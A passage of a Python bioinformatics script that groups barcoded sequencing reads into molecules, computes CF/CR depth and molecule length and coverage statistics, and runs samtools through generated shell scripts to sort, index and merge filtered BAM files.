samfile_list:\r\n\t\t\tsam = sam.strip()\r\n\t\t\tsys.stderr.write(\"[ %s ] processing: %s \\n\" %(time.asctime(), sam))\r\n\t\t\tsamfile = open(sam, 'r')\r\n\r\n\t\t\ttmpsaminfodict = dict()\r\n\t\t\tif molecule_length > 0:\r\n\t\t\t\tmolecule_pass = 0\r\n\t\t\t\tfiltered_samfile = sam.replace(\"sorted_by_barcode.sam\", \"sorted_by_barcode.filtered.sam\")\r\n\t\t\t\tfailed_samfile = sam.replace(\"sorted_by_barcode.sam\", \"sorted_by_barcode.failed.sam\")\r\n\t\t\t\ttmpshell = filtered_samfile + \".sh\"\r\n\t\t\t\twtmpshell = open(tmpshell, 'w')\r\n\t\t\t\tshell_line = \" \".join([samtools_path, \"view -H\", sorted_bam, \"| grep -v coordinate >\", filtered_samfile, \"\\n\"])\r\n\t\t\t\twtmpshell.write(shell_line)\r\n\t\t\t\tshell_line = \" \".join([samtools_path, \"view -H\", sorted_bam, \"| grep -v coordinate >\", failed_samfile, \"\\n\"])\r\n\t\t\t\twtmpshell.write(shell_line)\r\n\t\t\t\twtmpshell.close()\r\n\t\t\t\tsubprocess.call([\"sh\", tmpshell])\r\n\t\t\t\tsubprocess.call([\"rm\", tmpshell])\r\n\r\n\t\t\t\twfiltered_samfile = open(filtered_samfile, 'a')\r\n\t\t\t\twfailed_samfile = open(failed_samfile, 'a')\r\n\r\n\t\t\twhile True:\r\n\t\t\t\tsaminfo = samfile.readline().strip()\r\n\t\t\t\tsaminfolist = re.split(\"\\t\", saminfo)\r\n\r\n\t\t\t\tif len(saminfo) == 0:\r\n\t\t\t\t\tbreak\r\n\t\t\t\telif saminfolist[5] == \"*\":\r\n\t\t\t\t\tsaminfo = saminfo + \"\\n\"\r\n\t\t\t\t\twfailed_samfile.write(saminfo)\r\n\t\t\t\telse:\r\n\t\t\t\t\tif saminfolist[0] in tmpsaminfodict:\r\n\t\t\t\t\t\ttmpsaminfodict[saminfolist[0]] += \"\\n\" + saminfo\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\ttmpsaminfodict[saminfolist[0]] = saminfo\r\n\t\t\t\t\tbarcode_field = [s for s in saminfolist if \"BX:Z:\" in s]\r\n\t\t\t\t\tif barcode_field != []:\r\n\t\t\t\t\t\tbc = barcode_field[0].split(\":\")[2].split(\"-\")[0]\r\n\t\t\t\t\t\tstart_pos = int(saminfolist[3])\r\n\t\t\t\t\t\treadlength = len(saminfolist[9])\r\n\t\t\t\t\t\tend_pos = start_pos + readlength - 1\r\n\t\t\t\t\t\tchrid = saminfolist[2]\r\n\t\t\t\t\t\tif bc not in allbarcode:\t\r\n\t\t\t\t\t\t\tif len(allbarcode) == 0:\r\n\t\t\t\t\t\t\t\tallbarcode[bc] = bc\r\n\t\t\t\t\t\t\t\treadid_dict[saminfolist[0]] = 1\r\n\t\t\t\t\t\t\t\tmolecule[mol_id].append(start_pos)\r\n\t\t\t\t\t\t\t\tmolecule2[mol_id].append(end_pos)\r\n\t\t\t\t\t\t\t\tmolecule3[mol_id] = readlength\r\n\t\t\t\t\t\t\t\tmolecule4[mol_id].append(saminfo)\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tse_num = 0\r\n\t\t\t\t\t\t\t\tpe_num = 0\r\n\t\t\t\t\t\t\t\tfor readid_ in readid_dict.keys():\r\n\t\t\t\t\t\t\t\t\tif readid_dict[readid_] == 2:\r\n\t\t\t\t\t\t\t\t\t\tpe_num += 1\r\n\t\t\t\t\t\t\t\t\telif readid_dict[readid_] == 1:\r\n\t\t\t\t\t\t\t\t\t\tse_num += 1\r\n\t\t\t\t\t\t\t\tif pe_num >= 2 or se_num >= 4 or (pe_num >= 1 and se_num >= 2):\r\n\t\t\t\t\t\t\t\t\tbarcodeinfo = sorted(allbarcode.keys())\r\n\t\t\t\t\t\t\t\t\tminpos = min(molecule[mol_id])\r\n\t\t\t\t\t\t\t\t\tmaxpos = max(molecule2[mol_id])\r\n\t\t\t\t\t\t\t\t\tall_CR += molecule3[mol_id]\r\n\t\t\t\t\t\t\t\t\tsmall_cf = maxpos - minpos + 1\r\n\t\t\t\t\t\t\t\t\tall_CF += small_cf\r\n\t\t\t\t\t\t\t\t\tqn = len(molecule[mol_id])\r\n\t\t\t\t\t\t\t\t\tfor eachinfo in molecule4[mol_id]:\r\n\t\t\t\t\t\t\t\t\t\tinfo_detail_list = re.split(\"\\t\", eachinfo)\r\n\t\t\t\t\t\t\t\t\t\tif small_cf not in molecule_length_distribution:\r\n\t\t\t\t\t\t\t\t\t\t\tmolecule_length_distribution[small_cf] = 1\r\n\t\t\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\t\t\tmolecule_length_distribution[small_cf] += 1\r\n\t\t\t\t\t\t\t\t\t\toutmoleculeinfo = \"\\t\".join([chrid, str(minpos), str(maxpos), str(small_cf), str(qn), barcodeinfo[0], str(mol_id), info_detail_list[0], info_detail_list[1], str(len(info_detail_list[9]))]) + \"\\n\"\r\n\r\n\t\t\t\t\t\t\t\t\t\tif barcodeinfo[0] not in barcode_molecule_amount:\r\n\t\t\t\t\t\t\t\t\t\t\tbarcode_molecule_amount[barcodeinfo[0]][mol_id] = 1\r\n\t\t\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\t\t\tif mol_id not in barcode_molecule_amount[barcodeinfo[0]]:\r\n\t\t\t\t\t\t\t\t\t\t\t\tbarcode_molecule_amount[barcodeinfo[0]][mol_id] = 1\r\n\r\n\t\t\t\t\t\t\t\t\t\tif mol_id not in molecule_really_covered:\r\n\t\t\t\t\t\t\t\t\t\t\tmolecule_really_covered[mol_id].append(small_cf)\r\n\t\t\t\t\t\t\t\t\t\t\tmolecule_really_covered[mol_id].append(len(info_detail_list[9]))\r\n\t\t\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\t\t\tmolecule_really_covered[mol_id][1] += len(info_detail_list[9])\r\n\r\n\t\t\t\t\t\t\t\t\t\tif molecule_length > 0 and molecule_length < small_cf:\r\n\t\t\t\t\t\t\t\t\t\t\tmolecule_pass = 1\r\n\t\t\t\t\t\t\t\t\t\t\tpass_filtered_info_list = info_detail_list[0:11]\r\n\t\t\t\t\t\t\t\t\t\t\tfor tag_info in range(11, len(info_detail_list)):\r\n\t\t\t\t\t\t\t\t\t\t\t\tif info_detail_list[tag_info].startswith(\"BI:Z:\") or info_detail_list[tag_info].startswith(\"BD:Z:\"):\r\n\t\t\t\t\t\t\t\t\t\t\t\t\tpass\r\n\t\t\t\t\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\t\t\t\t\tpass_filtered_info_list.append(info_detail_list[tag_info])\r\n\t\t\t\t\t\t\t\t\t\t\tpass_filtered_info = \"\\t\".join(pass_filtered_info_list) + \"\\n\"\r\n\t\t\t\t\t\t\t\t\t\t\twfiltered_samfile.write(pass_filtered_info)\r\n\t\t\t\t\t\t\t\t\t\twmarked_molecule.write(outmoleculeinfo.encode())\r\n\t\t\t\t\t\t\t\t\tmol_id += 1\r\n\t\t\t\t\t\t\t\t\ttmpsaminfodict = dict()\r\n\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\tfor readid_ in tmpsaminfodict.keys():\r\n\t\t\t\t\t\t\t\t\t\tbroken_info = tmpsaminfodict[readid_] + \"\\n\"\r\n\t\t\t\t\t\t\t\t\t\twfailed_samfile.write(broken_info)\r\n\t\t\t\t\t\t\t\t\ttmpsaminfodict = dict()\r\n\r\n#\t\t\t\t\t\t\t\tfor barcode_molecule_barcode in barcode_molecule_amount.keys():\r\n#\t\t\t\t\t\t\t\t\tseparate_num = len(barcode_molecule_amount[barcode_molecule_barcode].keys())\r\n#\t\t\t\t\t\t\t\t\tinfo = barcode_molecule_barcode + \"\\t\" + str(separate_num) + \"\\n\"\r\n#\t\t\t\t\t\t\t\t\twbarcode_molecule_amount_file.write(info)\r\n\r\n\t\t\t\t\t\t\t\tfor mol_id_key in molecule_really_covered.keys():\r\n\t\t\t\t\t\t\t\t\tsmall_cfcf_rate = 1.0 * molecule_really_covered[mol_id_key][1] / molecule_really_covered[mol_id_key][0]\r\n\t\t\t\t\t\t\t\t\tinfo = str(mol_id_key) + \"\\t\" + str(molecule_really_covered[mol_id_key][0]) + \"\\t\" + str(molecule_really_covered[mol_id_key][1]) + \"\\t\" + str(small_cfcf_rate) + \"\\n\"\r\n\t\t\t\t\t\t\t\t\twmolecule_really_covered_file.write(info)\r\n\r\n\t\t\t\t\t\t\t\t\tsmall_cfcf_rate_expand = int(100 * small_cfcf_rate)\r\n\t\t\t\t\t\t\t\t\tmolecule_coverage_distribution[small_cfcf_rate_expand] += 1\r\n\t\t\t\t\t\t\t\t\tmolecule_coverage_distribution_sum += 1\r\n\r\n\t\t\t\t\t\t\t\tmolecule_really_covered = defaultdict(list)\r\n\t\t\t\t\t\t\t\tbarcode_molecule_amount = defaultdict(dict)\r\n\t\t\t\t\t\t\t\tallbarcode = dict()\r\n\t\t\t\t\t\t\t\treadid_dict = defaultdict(int)\r\n\t\t\t\t\t\t\t\tmolecule = defaultdict(list)\r\n\t\t\t\t\t\t\t\tmolecule2 = defaultdict(list)\r\n\t\t\t\t\t\t\t\tmolecule3 = defaultdict(int)\r\n\t\t\t\t\t\t\t\tmolecule4 = defaultdict(list)\r\n\t\t\t\t\t\t\t\tallbarcode[bc] = bc\r\n\t\t\t\t\t\t\t\treadid_dict[saminfolist[0]] = 1\r\n\t\t\t\t\t\t\t\tmolecule[mol_id].append(start_pos)\r\n\t\t\t\t\t\t\t\tmolecule2[mol_id].append(end_pos)\r\n\t\t\t\t\t\t\t\tmolecule3[mol_id] = readlength\r\n\t\t\t\t\t\t\t\tmolecule4[mol_id].append(saminfo)\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tdist = start_pos - molecule[mol_id][-1]\r\n\t\t\t\t\t\t\tif dist < 50000:\r\n\t\t\t\t\t\t\t\treadid_dict[saminfolist[0]] += 1\r\n\t\t\t\t\t\t\t\tmolecule[mol_id].append(start_pos)\r\n\t\t\t\t\t\t\t\tmolecule2[mol_id].append(end_pos)\r\n\t\t\t\t\t\t\t\tmolecule3[mol_id] += readlength\r\n\t\t\t\t\t\t\t\tmolecule4[mol_id].append(saminfo)\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tse_num = 0\r\n\t\t\t\t\t\t\t\tpe_num = 0\r\n\t\t\t\t\t\t\t\tfor readid_ in readid_dict.keys():\r\n\t\t\t\t\t\t\t\t\tif readid_dict[readid_] == 2:\r\n\t\t\t\t\t\t\t\t\t\tpe_num += 1\r\n\t\t\t\t\t\t\t\t\telif readid_dict[readid_] == 1:\r\n\t\t\t\t\t\t\t\t\t\tse_num += 1\r\n\t\t\t\t\t\t\t\tif pe_num >= 2 or se_num >= 4 or (pe_num >= 1 and se_num >= 2):\r\n\t\t\t\t\t\t\t\t\tminpos = min(molecule[mol_id])\r\n\t\t\t\t\t\t\t\t\tmaxpos = max(molecule2[mol_id])\r\n\t\t\t\t\t\t\t\t\tall_CR += molecule3[mol_id]\r\n\t\t\t\t\t\t\t\t\tsmall_cf = maxpos - minpos + 1\r\n\t\t\t\t\t\t\t\t\tall_CF += small_cf\r\n\t\t\t\t\t\t\t\t\tqn = len(molecule[mol_id])\r\n\t\t\t\t\t\t\t\t\tbarcodeinfo = sorted(allbarcode.keys())\r\n\t\t\t\t\t\t\t\t\tfor eachinfo in molecule4[mol_id]:\r\n\t\t\t\t\t\t\t\t\t\tinfo_detail_list = re.split(\"\\t\", eachinfo)\r\n\t\t\t\t\t\t\t\t\t\tif small_cf not in molecule_length_distribution:\r\n\t\t\t\t\t\t\t\t\t\t\tmolecule_length_distribution[small_cf] = 1\r\n\t\t\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\t\t\tmolecule_length_distribution[small_cf] += 1\r\n\t\t\t\t\t\t\t\t\t\toutmoleculeinfo = \"\\t\".join([chrid, str(minpos), str(maxpos), str(small_cf), str(qn), barcodeinfo[0], str(mol_id), info_detail_list[0], info_detail_list[1], str(len(info_detail_list[9]))]) + \"\\n\"\r\n\r\n\t\t\t\t\t\t\t\t\t\tif barcodeinfo[0] not in barcode_molecule_amount:\r\n\t\t\t\t\t\t\t\t\t\t\tbarcode_molecule_amount[barcodeinfo[0]][mol_id] = 1\r\n\t\t\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\t\t\tif mol_id not in barcode_molecule_amount[barcodeinfo[0]]:\r\n\t\t\t\t\t\t\t\t\t\t\t\tbarcode_molecule_amount[barcodeinfo[0]][mol_id] = 1\r\n\r\n\t\t\t\t\t\t\t\t\t\tif mol_id not in molecule_really_covered:\r\n\t\t\t\t\t\t\t\t\t\t\tmolecule_really_covered[mol_id].append(small_cf)\r\n\t\t\t\t\t\t\t\t\t\t\tmolecule_really_covered[mol_id].append(len(info_detail_list[9]))\r\n\t\t\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\t\t\tmolecule_really_covered[mol_id][1] += len(info_detail_list[9])\r\n\r\n\t\t\t\t\t\t\t\t\t\tif molecule_length > 0 and molecule_length < small_cf:\r\n\t\t\t\t\t\t\t\t\t\t\tmolecule_pass = 1\r\n\t\t\t\t\t\t\t\t\t\t\tpass_filtered_info_list = info_detail_list[0:11]\r\n\t\t\t\t\t\t\t\t\t\t\tfor tag_info in range(11, len(info_detail_list)):\r\n\t\t\t\t\t\t\t\t\t\t\t\tif info_detail_list[tag_info].startswith(\"BI:Z:\") or info_detail_list[tag_info].startswith(\"BD:Z:\"):\r\n\t\t\t\t\t\t\t\t\t\t\t\t\tpass\r\n\t\t\t\t\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\t\t\t\t\tpass_filtered_info_list.append(info_detail_list[tag_info])\r\n\t\t\t\t\t\t\t\t\t\t\tpass_filtered_info = \"\\t\".join(pass_filtered_info_list) + \"\\n\"\r\n\t\t\t\t\t\t\t\t\t\t\twfiltered_samfile.write(pass_filtered_info)\r\n\t\t\t\t\t\t\t\t\t\twmarked_molecule.write(outmoleculeinfo.encode())\r\n\t\t\t\t\t\t\t\t\tmol_id += 1\r\n\t\t\t\t\t\t\t\t\ttmpsaminfodict = dict()\r\n\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\tfor readid_ in tmpsaminfodict.keys():\r\n\t\t\t\t\t\t\t\t\t\tbroken_info = tmpsaminfodict[readid_] + \"\\n\"\r\n\t\t\t\t\t\t\t\t\t\twfailed_samfile.write(broken_info)\r\n\t\t\t\t\t\t\t\t\ttmpsaminfodict = dict()\r\n\r\n#\t\t\t\t\t\t\t\tfor barcode_molecule_barcode in barcode_molecule_amount.keys():\r\n#\t\t\t\t\t\t\t\t\tseparate_num = len(barcode_molecule_amount[barcode_molecule_barcode].keys())\r\n#\t\t\t\t\t\t\t\t\tinfo = barcode_molecule_barcode + \"\\t\" + str(separate_num) + \"\\n\"\r\n#\t\t\t\t\t\t\t\t\twbarcode_molecule_amount_file.write(info)\r\n\t\t\t\t\t\t\t\tbarcode_molecule_amount = defaultdict(dict)\r\n\r\n\t\t\t\t\t\t\t\tfor mol_id_key in molecule_really_covered.keys():\r\n\t\t\t\t\t\t\t\t\tsmall_cfcf_rate = 1.0 * molecule_really_covered[mol_id_key][1] / molecule_really_covered[mol_id_key][0]\r\n\t\t\t\t\t\t\t\t\tinfo = str(mol_id_key) + \"\\t\" + str(molecule_really_covered[mol_id_key][0]) + \"\\t\" + str(molecule_really_covered[mol_id_key][1]) + \"\\t\" + str(small_cfcf_rate) + \"\\n\"\r\n\t\t\t\t\t\t\t\t\twmolecule_really_covered_file.write(info)\r\n\t\t\t\t\t\t\t\t\tsmall_cfcf_rate_expand = int(100 * small_cfcf_rate)\r\n\t\t\t\t\t\t\t\t\tmolecule_coverage_distribution[small_cfcf_rate_expand] += 1\r\n\t\t\t\t\t\t\t\t\tmolecule_coverage_distribution_sum += 1\r\n\r\n\t\t\t\t\t\t\t\tmolecule_really_covered = defaultdict(list)\r\n\t\t\t\t\t\t\t\tbarcode_molecule_amount = defaultdict(dict)\r\n\t\t\t\t\t\t\t\tallbarcode = dict()\r\n\t\t\t\t\t\t\t\treadid_dict = defaultdict(int)\r\n\t\t\t\t\t\t\t\tmolecule = defaultdict(list)\r\n\t\t\t\t\t\t\t\tmolecule2 = defaultdict(list)\r\n\t\t\t\t\t\t\t\tmolecule3 = defaultdict(int)\r\n\t\t\t\t\t\t\t\tmolecule4 = defaultdict(list)\r\n\t\t\t\t\t\t\t\tallbarcode[bc] = bc\r\n\t\t\t\t\t\t\t\treadid_dict[saminfolist[0]] = 1\r\n\t\t\t\t\t\t\t\tmolecule[mol_id].append(start_pos)\r\n\t\t\t\t\t\t\t\tmolecule2[mol_id].append(end_pos)\r\n\t\t\t\t\t\t\t\tmolecule3[mol_id] = readlength\r\n\t\t\t\t\t\t\t\tmolecule4[mol_id].append(saminfo)\r\n\r\n\t\t\tif molecule_length > 0:\r\n\t\t\t\twfiltered_samfile.close()\r\n\t\t\t\twfailed_samfile.close()\r\n\t\t\t\ttmpshell = filtered_samfile + \".sh\"\r\n\t\t\t\ttmpdir = os.path.dirname(tmpshell)\r\n\t\t\t\tfiltered_bamfile = filtered_samfile.replace(\"filtered.sam\", \"filtered.bam\")\r\n\t\t\t\tfailed_bamfile = failed_samfile.replace(\"failed.sam\", \"failed.bam\")\r\n\t\t\t\twtmpshell = open(tmpshell, 'w')\r\n\t\t\t\tsv = self.find_samtools_version(samtools_path, tmpdir)\r\n\t\t\t\tif sv == 0:\r\n\t\t\t\t\tshell_line = \" \".join([samtools_path, \"view -h -S\", filtered_samfile, \"-b >\", filtered_samfile + \".bam\\n\", samtools_path, \"sort -m 500M\", filtered_samfile + \".bam\", filtered_bamfile, \"\\nmv\", filtered_bamfile + \".bam\", filtered_bamfile, \"\\n\"])\r\n\t\t\t\t\twtmpshell.write(shell_line)\r\n\t\t\t\t\tshell_line = \" \".join([samtools_path, \"view -h -S\", failed_samfile, \"-b >\", failed_samfile + \".bam\\n\", samtools_path, \"sort -m 500M\", failed_samfile + \".bam\", failed_bamfile, \"\\nmv\", failed_bamfile + \".bam\", failed_bamfile, \"\\n\"])\r\n\t\t\t\t\twtmpshell.write(shell_line)\r\n\t\t\t\telse:\r\n\t\t\t\t\tshell_line = \" \".join([samtools_path, \"view -h -S\", filtered_samfile, \"-b |\", samtools_path, \"sort -m 500M -T - -o\", filtered_bamfile, \"\\n\"])\r\n\t\t\t\t\twtmpshell.write(shell_line)\r\n\t\t\t\t\tshell_line = \" \".join([samtools_path, \"view -h -S\", failed_samfile, \"-b |\", samtools_path, \"sort -m 500M -T - -o\", failed_bamfile, \"\\n\"])\r\n\t\t\t\t\twtmpshell.write(shell_line)\r\n\t\t\t\tshell_line = \" \".join([samtools_path, \"index\", filtered_bamfile, filtered_bamfile + \".bai\\n\"])\r\n\t\t\t\twtmpshell.write(shell_line)\r\n\t\t\t\tshell_line = \" \".join([samtools_path, \"index\", failed_bamfile, failed_bamfile + \".bai\\n\"])\r\n\t\t\t\twtmpshell.write(shell_line)\r\n\t\t\t\twtmpshell.close()\r\n\t\t\t\tsubprocess.call([\"sh\", tmpshell])\r\n\t\t\t\tsubprocess.call([\"rm\", tmpshell])\r\n\r\n\t\t\t\tfilter_molecule_bam_list.append(filtered_bamfile)\r\n\t\t\t\tfailed_molecule_bam_list.append(failed_bamfile)\r\n\t\t\tsamfile.close()\r\n\t\twmarked_molecule.close()\r\n\t\tsamfile_list.close()\r\n#\t\twbroken_molecule.close()\r\n\r\n\t\tfilter_merge_bam = (sorted_bam + \".filtered\").replace(\"bam.filtered\", \"filtered.bam\")\r\n\t\tfailed_merge_bam = filter_merge_bam.replace(\"filtered.bam\", \"failed.bam\")\r\n\t\tif molecule_length > 0 and len(filter_molecule_bam_list) > 0:\r\n\t\t\tshelldir = os.path.dirname(sorted_bam) + \"/shell\"\r\n\t\t\tif os.path.isdir(shelldir):\r\n\t\t\t\tpass\r\n\t\t\telse:\r\n\t\t\t\tos.makedirs(shelldir)\r\n\t\t\ttmpshell = shelldir + \"/merge_molecule_filtered_bam.sh\"\r\n\t\t\twtmpshell = open(tmpshell, 'w')\r\n\t\t\tif len(filter_molecule_bam_list) > 1:\r\n\t\t\t\tfiltered_bam_name = \" \".join(filter_molecule_bam_list)\r\n\t\t\t\tfailed_bam_name = \" \".join(failed_molecule_bam_list)\r\n\t\t\t\tshell_line = \" \".join([samtools_path, \"merge -f\", filter_merge_bam, filtered_bam_name, \"\\n\", samtools_path, \"index\", filter_merge_bam, filter_merge_bam + \".bai\\n\"])\r\n\t\t\t\twtmpshell.write(shell_line)\r\n\t\t\t\tshell_line = \" \".join([samtools_path, \"merge -f\", failed_merge_bam, failed_bam_name, \"\\n\", samtools_path, \"index\", failed_merge_bam, failed_merge_bam + \".bai\\n\"])\r\n\t\t\t\twtmpshell.write(shell_line)\r\n\t\t\telse:\r\n\t\t\t\tshell_line = \" \".join([\"ln\", \"-s\", \"-f\", filter_molecule_bam_list[0], filter_merge_bam + \"\\n\", \"ln\", \"-s\", \"-f\", filter_molecule_bam_list[0] + \".bai\", filter_merge_bam + \".bai\\n\"])\r\n\t\t\t\twtmpshell.write(shell_line)\r\n\t\t\t\tshell_line = \" \".join([\"ln\", \"-s\", \"-f\", failed_molecule_bam_list[0], failed_bam_name + \"\\n\", \"ln\", \"-s\", \"-f\", failed_molecule_bam_list[0] + \".bai\", failed_merge_bam + \".bai\\n\"])\r\n\t\t\t\twtmpshell.write(shell_line)\r\n\t\t\twtmpshell.close()\r\n\t\t\tsubprocess.call([\"sh\", tmpshell])\r\n\t\telse:\r\n\t\t\tsubprocess.call([\"ln\", \"-s\", \"-f\", sorted_bam, filter_merge_bam])\r\n\t\t\told_bai = sorted_bam.replace(\"marked.bai\", \"marked.bam.bai\")\r\n\t\t\tnew_bai = filter_merge_bam + \".bai\"\r\n\t\t\tsubprocess.call([\"ln\", \"-s\", \"-f\", old_bai, new_bai])\r\n\r\n\t\tcfcr_stat_file = os.path.join(statistics_report_dir, \"CFCR.stat\")\r\n\t\twcfcr_stat_file = open(cfcr_stat_file, 'w')\r\n\t\tstat_line = \"Item\" + \"\\t\" + \"CF/CR length\" + \"\\t\" + \"genome_size\" + \"\\t\" + \"CF/CR depth\\n\"\r\n\t\twcfcr_stat_file.write(stat_line)\r\n\t\ttarget_size = int(target_size)\r\n\t\tCF_depth = all_CF / float(target_size)\r\n\t\tCR_depth = all_CR / float(all_CF)\r\n\r\n\t\tstat_line = \"CF:\" + \"\\t\" + str(all_CF) + \"\\t\" + str(target_size) + \"\\t\" + str(CF_depth) + \"\\n\"\r\n\t\twcfcr_stat_file.write(stat_line)\r\n\t\tstat_line = \"CR:\" + \"\\t\" + str(all_CR) + \"\\t\" + str(all_CF) + \"\\t\" + str(CR_depth) + \"\\n\"\r\n\t\twcfcr_stat_file.write(stat_line)\r\n\t\twcfcr_stat_file.close()\r\n\r\n\t\tmolecule_length_distribution_file = os.path.join(statistics_report_dir, \"molecule_length_distribution.txt\")\r\n\t\twmolecule_length_distribution_file = open(molecule_length_distribution_file, 'w')\r\n\t\twmolecule_length_distribution_file.write(\"molecule_length\\tamount\\n\")\r\n\t\tfor molecule_length_id in sorted(molecule_length_distribution.keys()):\r\n\t\t\tinfo = str(molecule_length_id) + \"\\t\" + str(molecule_length_distribution[molecule_length_id]) + \"\\n\"\r\n\t\t\twmolecule_length_distribution_file.write(info)\r\n\t\twmolecule_length_distribution_file.close()\r\n#\t\twbarcode_molecule_amount_file.close()\r\n\t\twmolecule_really_covered_file.close()\r\n\r\n\t\tfor n in range(0,max(molecule_coverage_distribution.keys()) + 1):\r\n\t\t\trate = round(100.0 * molecule_coverage_distribution[n] / molecule_coverage_distribution_sum, 2)\r\n\t\t\tinfo = str(n * 0.01) + \"\\t\" + str(rate) + \"\\n\"\r\n\t\t\twmolecule_coverage_distribution_file.write(info)\r\n\t\twmolecule_coverage_distribution_file.close()\r\n\r\n\t\trmarked_molecule = gzip.open(marked_molecule, 'rb')\r\n\t\tmerge_molecule_file = os.path.join(statistics_report_dir, \"fragment_info.csv\")\r\n\t\twmerge_molecule_file = open(merge_molecule_file, 'w')\r\n\t\tmolecule_id = 0\r\n\t\tmerge_molecule_info_list = list()\r\n\t\tfor mm in range(9):\r\n\t\t\tmerge_molecule_info_list.append(0)\r\n\t\tfor molecule_read_info in rmarked_molecule:\r\n\t\t\tmolecule_read_info_list = re.split(\"\\t\", molecule_read_info.decode().strip())\r\n\t\t\tif int(molecule_read_info_list[6]) == molecule_id:\r\n\t\t\t\tmerge_molecule_info_list[7] += int(molecule_read_info_list[9])\r\n\t\t\telse:\r\n\t\t\t\tif molecule_id > 0:\r\n\t\t\t\t\tmerge_molecule_info_list[8] = str(round(1.0 * merge_molecule_info_list[7] / int(merge_molecule_info_list[5]), 2))\r\n\t\t\t\t\tmerge_molecule_info_list[7] = str(merge_molecule_info_list[7])\r\n\t\t\t\t\tmerge_molecule_info = \",\".join(merge_molecule_info_list) + \"\\n\"\r\n\t\t\t\t\twmerge_molecule_file.write(merge_molecule_info)\r\n\r\n\t\t\t\t\tmerge_molecule_info_list[0] = str(molecule_read_info_list[6])\r\n\t\t\t\t\tmerge_molecule_info_list[1] = str(molecule_read_info_list[5])\r\n\t\t\t\t\tmerge_molecule_info_list[2] = str(molecule_read_info_list[0])\r\n\t\t\t\t\tmerge_molecule_info_list[3] = str(molecule_read_info_list[1])\r\n\t\t\t\t\tmerge_molecule_info_list[4] = str(molecule_read_info_list[2])\r\n\t\t\t\t\tmerge_molecule_info_list[5] = str(molecule_read_info_list[3])\r\n\t\t\t\t\tmerge_molecule_info_list[6] = str(molecule_read_info_list[4])\r\n\t\t\t\t\tmerge_molecule_info_list[7] = int(molecule_read_info_list[9])\r\n\t\t\t\t\tmolecule_id = int(molecule_read_info_list[6])\r\n\t\t\t\telse:\r\n\t\t\t\t\tmerge_molecule_info_list[0] = str(molecule_read_info_list[6])\r\n\t\t\t\t\tmerge_molecule_info_list[1] = str(molecule_read_info_list[5])\r\n\t\t\t\t\tmerge_molecule_info_list[2] = str(molecule_read_info_list[0])\r\n\t\t\t\t\tmerge_molecule_info_list[3] = str(molecule_read_info_list[1])\r\n\t\t\t\t\tmerge_molecule_info_list[4] = str(molecule_read_info_list[2])\r\n\t\t\t\t\tmerge_molecule_info_list[5] = str(molecule_read_info_list[3])\r\n\t\t\t\t\tmerge_molecule_info_list[6] = str(molecule_read_info_list[4])\r\n\t\t\t\t\tmerge_molecule_info_list[7] = int(molecule_read_info_list[9])\r\n\t\t\t\t\tmolecule_id = int(molecule_read_info_list[6])\r\n\t\tmerge_molecule_info_list[8] = str(round(1.0 * merge_molecule_info_list[7] / int(merge_molecule_info_list[5]), 2))\r\n\t\tmerge_molecule_info_list[7] = str(merge_molecule_info_list[7])\r\n\t\tmerge_molecule_info = \",\".join(merge_molecule_info_list) + \"\\n\"\r\n\t\twmerge_molecule_file.write(merge_molecule_info)\r\n\t\twmerge_molecule_file.close()\r\n\t\trmarked_molecule.close()\r\n\r\n\t\treturn(statistics_report_dir)\r\n\r\ndef usage():\r\n\tcalculation_usage = \\\r\n\t'''\r\n\tcalculate CF and CR\r\n\tVersion: 1.0.0\r\n\tDependents: Python (>=3.0), SAMtools\r\n\tLast Updated Date: 2017-06-01\r\n\tContact: meijp@foxmail.com\r\n\r\n\tUsage: python calculate.py \r\n\r\n\tOptions:\r\n\t\t-i --input, path of input bam file\r\n\t\t-o --outputdir, the path of output directory\r\n\t\t-c --config, the path of configuration file [default: outdir/config/Basic.config]\r\n\t\t-m --minlen, minimum molecule length [default: 500bp]\r\n\t\t-h --help, help info\r\n\r\n\t'''\r\n\tprint(calculation_usage)\r\n\r\nif __name__ == '__main__':\r\n\tif len(sys.argv) < 5:\r\n\t\tusage()\r\n\t\tsys.exit(-1)\r\n\r\n\tinputbam = None\r\n\toutputdir = None\r\n\tConfigFile = None\r\n\tMolecule_length = 500\r\n\topts, args = getopt.gnu_getopt(sys.argv[1:], 'i:o:m:c:h:', ['input', 'outputdir', 'minlen', 'config', 'help'])\r\n\tfor o, a in opts:\r\n\t\tif o == '-i' or o == '--input':\r\n\t\t\tinputbam = a\r\n\t\tif o == '-o' or o == '--outputdir':\r\n\t\t\toutputdir = a\r\n\t\tif o == '-m' or o == '--minlen':\r\n\t\t\tMolecule_length = int(a)\r\n\t\tif o == '-c' or o == '--config':\r\n\t\t\tConfigFile = a\r\n\t\tif o == '-h' or o == '--help':\r\n\t\t\tusage()\r\n\t\t\tsys.exit(-1)\r\n\r\n\tif ConfigFile == None:\r\n\t\tscript_abs_path = os.path.abspath(sys.argv[0])\r\n\t\tcreate_config_py = os.path.join(os.path.dirname(script_abs_path), \"create_config.py\")\r\n\t\tconfig_dir = os.path.join(outputdir, \"config\")\r\n\t\tif os.path.isdir(config_dir):\r\n\t\t\tpass\r\n\t\telse:\r\n\t\t\tos.mkdir(config_dir)\r\n\t\ttmpshell = os.path.join(config_dir, \"cc.sh\")\r\n\t\twtmpshell = open(tmpshell, 'w')\r\n\t\tshell_line = \" \".join([\"python\", create_config_py, \"Basic -o\", config_dir, \"\\n\"])\r\n\t\twtmpshell.write(shell_line)\r\n\t\twtmpshell.close()\r\n\t\tsubprocess.call([\"sh\", tmpshell])\r\n\t\tsubprocess.call([\"rm\", tmpshell])\r\n\t\tConfigFile = os.path.join(config_dir, \"Basic.config\")\r\n\r\n\tG = baseinfo()\r\n\tG.get_config(ConfigFile)\r\n\tsamtools 